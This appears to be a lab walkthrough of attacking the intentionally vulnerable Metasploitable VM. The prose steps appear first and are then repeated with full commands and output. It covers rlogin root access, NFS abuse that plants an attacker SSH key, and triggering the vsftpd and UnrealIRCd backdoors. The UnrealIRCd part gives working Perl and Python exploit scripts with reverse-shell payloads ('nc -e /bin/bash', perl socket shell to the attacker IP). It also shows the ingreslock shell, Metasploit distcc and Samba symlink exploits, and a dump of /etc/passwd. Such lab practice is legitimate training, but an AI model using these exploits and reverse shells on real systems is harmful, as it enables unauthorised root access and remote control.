Metasploitable IP : 192.168.56.101
Attacker Machine IP : 192.168.56.1
Now starting with nmap Scan :
rlogin:
at the above scan tcp port 512, 513 and 514 are known as "r" services, and have been mis-configured to allow remote access from any host a standard ".rhosts + +" situation) To expoit this configuration we need to install "rsh-client" in ubuntu "apt-get install rsh-client" then at root terminal run this command
if the rsh-tools are not installed then it will ask for ssh keys.
NFS[Network File System] misconfiguration :
NFS can be identified by probing port 2049 directly or asking portmapper for a list of services. first make sure the rpcbind and nfs-common packages are installed properly. To install these packages type 'apt-get install rpcbind'. Now we use rpcinfo to identify the NFS
where '-p' flag is for probing . Now using showmount utility to determine the NFS mount information. To install showmount utility type 'apt-get install nfs-common'
where '-e' flag means show the server's exports files, '/*' means the root file system is mounted. Now we can access the system by ssh deamon. To do this we will generate a new ssh key at attacking system, mount the NFS export , and add our key to root user account's authorized_keys. now generating ssh keys
Now we need to mount the server's exports filesystem which is root and overwrite the servers authorized access keys with the attackers public keys
Now just ssh the target vm
VSFTPD backdoor :
VSFTPD is a popular ftpd server. the perticular version of vsftpd 2.3.4 was backdoored by an unknown intruder. To trigger the backdoor attacker need to provide a smiley face ':)' in the end of user field at the login. Now first of all we need to identify the version of vsftpd version
where '-sV' flag is used for version detection. Now to exploit the backdoor just trigger the backdoor then it starts to listen on port 6200, so we just need to connect to port 6200 on target system. Note: In my test vm the port 6200 is instantly closed when triggering process ends. So i just start nc in while loop so it connects to the target box instantly when backdoor is triggered.
above commands tries to connect to port 6200 repeatedly, now we trigger the backdoor in another terminal
and then it connects to the target system
python -c "import pty;pty.spawn('/bin/bash')" command gets us a prompt, which looks cool !!. To cancel it just press Ctrl + C
Unreal IRCD Backdoor (RCE):
unrealIRCD 2.3.8 deamon is backdoored by someone which is undetected for 6 to 8 months. the backdoor will be triggered by "AB" which is send to the irc server in the login process along with the other command. we have a perl exploit for this which is available at exploit-db.com, just start the netcat listener and fire the exploit
download the above script from here
just change the address 192.168.0.101 with your attacker machine address. Now first start nc listener
and then fire up exploit
and then in the nc listener
Similarly we have a python exploit for it.
Download script from here
For this start nc listener and fire the exploit
Ingreslock Backdoor:
The port 1524 was the old "ingreslock" backdoor.
Distccd Misconfiguration:
distcc daemon is running on port 3632. Exploiting it with metasploit
Samba Misconfiguration:
for more info https://www.samba.org/samba/news/symlink_attack.html
https://www.rapid7.com/db/modules/auxiliary/admin/smb/samba_symlink_traversal
you need to install smbclient to check the shared folders 'sudo apt-get install smbclient'
now fire-up metasploit
now open another terminal with root privilege
Now thats enough for today. I hope you enjoy reading. thanks you.
Attacker Machine IP : 192.168.56.1
Now starting with nmap Scan :
ajay@Test:~$ nmap -sV -p1-10000 192.168.56.101
Starting Nmap 7.60SVN ( https://nmap.org ) at 2017-11-12 06:38 EST
Nmap scan report for 192.168.56.101
Host is up (0.0028s latency).
Not shown: 9974 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
rlogin:
at the above scan tcp port 512, 513 and 514 are known as "r" services, and have been mis-configured to allow remote access from any host a standard ".rhosts + +" situation) To expoit this configuration we need to install "rsh-client" in ubuntu "apt-get install rsh-client" then at root terminal run this command
root@Test:~# rlogin -l root 192.168.56.101
Last login: Sun Nov 12 06:23:25 EST 2017 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#
if the rsh-tools are not installed then it will ask for ssh keys.
NFS[Network File System] misconfiguration :
NFS can be identified by probing port 2049 directly or asking portmapper for a list of services. first make sure the rpcbind and nfs-common packages are installed properly. To install these packages type 'apt-get install rpcbind'. Now we use rpcinfo to identify the NFS
root@Test:~# rpcinfo -p 192.168.56.101
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 43295 status
100024 1 tcp 57457 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 55770 nlockmgr
100021 3 udp 55770 nlockmgr
100021 4 udp 55770 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 50302 nlockmgr
100021 3 tcp 50302 nlockmgr
100021 4 tcp 50302 nlockmgr
100005 1 udp 53964 mountd
100005 1 tcp 42995 mountd
100005 2 udp 53964 mountd
100005 2 tcp 42995 mountd
100005 3 udp 53964 mountd
100005 3 tcp 42995 mountd
root@Test:~#
where '-p' flag is for probing . Now using showmount utility to determine the NFS mount information. To install showmount utility type 'apt-get install nfs-common'
root@Test:~# showmount -e 192.168.56.101
Export list for 192.168.56.101:
/ *
root@Test:~#
where '-e' flag means show the server's exports files, '/*' means the root file system is mounted. Now we can access the system by ssh deamon. To do this we will generate a new ssh key at attacking system, mount the NFS export , and add our key to root user account's authorized_keys. now generating ssh keys
root@Test:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:az/b1xAxStYiHyADuHlXeqnsLo1S+81SqTJiE04Vlbg root@SecLab
The key's randomart image is:
+---[RSA 2048]----+
| ..++... . |
| . o .oo = + |
| o o o * + o |
| o E o o o . |
| o oSo . . |
| o . o.o . |
| o o =oo o |
| * *.=+.. . .|
| . + *o.=o.. |
+----[SHA256]-----+
Now we need to mount the server's exports filesystem which is root and overwrite the servers authorized access keys with the attackers public keys
root@Test:~# mkdir /tmp/r00t
root@Test:~# mount -t nfs 192.168.56.101:/ /tmp/r00t/
root@Test:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@Test:~# umount /tmp/r00t/
Now just ssh the target vm
root@Test:~# ssh root@192.168.56.101
Last login: Sun Nov 12 07:19:33 2017 from 192.168.56.1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# whoami
root
root@metasploitable:~#
VSFTPD backdoor :
VSFTPD is a popular ftpd server. the perticular version of vsftpd 2.3.4 was backdoored by an unknown intruder. To trigger the backdoor attacker need to provide a smiley face ':)' in the end of user field at the login. Now first of all we need to identify the version of vsftpd version
root@Test:~# nmap -p21 -sV 192.168.56.101
Starting Nmap 7.60SVN ( https://nmap.org ) at 2017-11-12 07:28 EST
Nmap scan report for 192.168.56.101
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
MAC Address: 08:00:27:55:DD:47 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
where '-sV' flag is used for version detection. Now to exploit the backdoor just trigger the backdoor then it starts to listen on port 6200, so we just need to connect to port 6200 on target system. Note: In my test vm the port 6200 is instantly closed when triggering process ends. So i just start nc in while loop so it connects to the target box instantly when backdoor is triggered.
ajay@Test:~$ while true
> do
> nc 192.168.56.101 6200
> done
above commands tries to connect to port 6200 repeatedly, now we trigger the backdoor in another terminal
root@Test:~# printf "user Test:)\r\n\r\npass test1\r\n\r\n" | nc 192.168.56.101 21
220 (vsFTPd 2.3.4)
331 Please specify the password.
and then it connects to the target system
ajay@Test:~$ while true
> do
> nc 192.168.56.101 6200
> done
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/# who
who
msfadmin tty1 Nov 12 06:32
root pts/0 Nov 12 06:23 (:0.0)
root@metasploitable:/#
python -c "import pty;pty.spawn('/bin/bash')" command gets us a prompt, which looks cool !!. To cancel it just press Ctrl + C
Unreal IRCD Backdoor (RCE):
unrealIRCD 2.3.8 deamon is backdoored by someone which is undetected for 6 to 8 months. the backdoor will be triggered by "AB" which is send to the irc server in the login process along with the other command. we have a perl exploit for this which is available at exploit-db.com, just start the netcat listener and fire the exploit
#!/usr/bin/perl
use Socket;
use IO::Socket;
# Generating Rshell payload with msfvenom
# msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw
my $payload = 'AB; perl -MIO -e \'$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};\'';
$host = "";
$port = "";
$host = @ARGV[0];
$port = @ARGV[1];
if ($host eq "") { usage(); }
if ($port eq "") { usage(); }
sub usage {
printf "\n Usage: unrealIRCD.pl [TARGET_IP] [TARGET_PORT]\n\n";
exit(1);
}
sub exploit {
my $sockd = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => "tcp") || die "[!] Failed to connect to $host on $port\n\n";
print "[*] Payload sent ...\n";
print $sockd "$payload";
close($sockd);
exit(1);
}
exploit();
download the above script from here
just change the address 192.168.0.101 with your attacker machine address. Now first start nc listener
ajay@Test:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444) and then fire up exploit
root@Test:~# ./unrealIRCD.pl
Usage: unrealIRCD.pl [TARGET_IP] [TARGET_PORT]
root@Test:~# ./unrealIRCD.pl 192.168.56.101 6667
[*] Payload sent ...
root@Test:~#
and then in the nc listener
ajay@Test:~$ nc -lvp 4444 Listening on [0.0.0.0] (family 0, port 4444)Connection from [192.168.56.101] port 4444 [tcp/*] accepted (family 2, sport 41732) root python -c "import pty;pty.spawn('/bin/bash')" root@metasploitable:/etc/unreal# ls ls Donation badwords.quit.conf ircd.log spamfilter.conf LICENSE curl-ca-bundle.crt ircd.pid tmp aliases dccallow.conf ircd.tune unreal badwords.channel.conf doc modules unrealircd.conf badwords.message.conf help.conf networks root@metasploitable:/etc/unreal#
Similarly we have a python exploit for it.
#!/usr/bin/python
import socket
import argparse
parser = argparse.ArgumentParser(description='UnrealIRCD 2.8.3.1 Backdoor Exploit')
parser.add_argument('-rh', '--rhost', help="IP of the victim")
parser.add_argument('-lh', '--lhost', help="IP of the Attacker")
parser.add_argument('-lp', '--lport', help="Port of the netcat Listener")
parser.add_argument('-rp', '--rport', help="Port of unrealIRCD")
arg = parser.parse_args()
sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((arg.rhost, int(arg.rport)))
sockfd.recv(2048)
sockfd.send("AB; sh -c '(nc " + arg.lhost + " " + arg.lport + " -e /bin/bash) '\n")
sockfd.close()
Download script from here
For this start nc listener and fire the exploit
root@Test:~# ./unrealIRCD.py -rh 192.168.56.101 -rp 6667 -lh 192.168.56.1 -lp 4444
Ingreslock Backdoor:
The port 1524 was the old "ingreslock" backdoor.
root@Test:~# nc 192.168.56.101 1524
root@metasploitable:/#
Distccd Misconfiguration:
distcc daemon is running on port 3632. Exploiting it with metasploit
msf > search distccd
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/bind_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(distcc_exec) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (192.168.56.1:35897 -> 192.168.56.101:4444) at 2017-11-12 09:34:10 -0500
whoami
daemon
python -c "import pty;pty.spawn('/bin/bash')"
daemon@metasploitable:/tmp$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Samba Misconfiguration:
for more info https://www.samba.org/samba/news/symlink_attack.html
https://www.rapid7.com/db/modules/auxiliary/admin/smb/samba_symlink_traversal
you need to install smbclient to check the shared folders 'sudo apt-get install smbclient'
root@Test:~# smbclient -L //192.168.56.101
WARNING: The "syslog" option is deprecated
Enter root's password: < hit enter without password >
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
root@Test:~#
now fire-up metasploit
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBSHARE yes The name of a writeable share on the server
SMBTARGET rootfs yes The name of the directory that should point to the root filesystem
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.56.101:445 - Now access the following share to browse the root filesystem:
[*] 192.168.56.101:445 - \\192.168.56.101\tmp\rootfs\
[*] Auxiliary module execution completed
msf auxiliary(samba_symlink_traversal) >
now open another terminal with root privilege
root@Test:~# smbclient //192.168.56.101/tmp/
WARNING: The "syslog" option is deprecated
Enter root's password: < hit enter without password >
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> ls
. DR 0 Sun May 20 15:36:12 2012
.. DR 0 Sun May 20 15:36:12 2012
initrd DR 0 Tue Mar 16 19:57:40 2010
media DR 0 Tue Mar 16 19:55:52 2010
bin DR 0 Mon May 14 00:35:33 2012
lost+found DR 0 Tue Mar 16 19:55:15 2010
mnt DR 0 Wed Apr 28 17:16:56 2010
sbin DR 0 Sun May 13 22:54:53 2012
initrd.img R 7929183 Mon May 14 00:35:56 2012
home DR 0 Fri Apr 16 03:16:02 2010
lib DR 0 Mon May 14 00:35:22 2012
usr DR 0 Wed Apr 28 01:06:37 2010
proc DR 0 Sun Nov 12 08:19:16 2017
root DR 0 Sun Nov 12 08:20:00 2017
sys DR 0 Sun Nov 12 08:19:17 2017
boot DR 0 Mon May 14 00:36:28 2012
nohup.out R 10868 Sun Nov 12 08:20:01 2017
etc DR 0 Sun Nov 12 08:19:53 2017
dev DR 0 Sun Nov 12 08:19:39 2017
vmlinuz R 1987288 Thu Apr 10 13:55:41 2008
opt DR 0 Tue Mar 16 19:57:39 2010
var DR 0 Sun May 20 18:30:19 2012
cdrom DR 0 Tue Mar 16 19:55:51 2010
tmp D 0 Sun Nov 12 09:50:34 2017
srv DR 0 Tue Mar 16 19:57:38 2010
7282168 blocks of size 1024. 5427840 blocks available
smb: \rootfs\> cd etc\
smb: \rootfs\etc\> more passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
Now thats enough for today. I hope you enjoy reading. thanks you.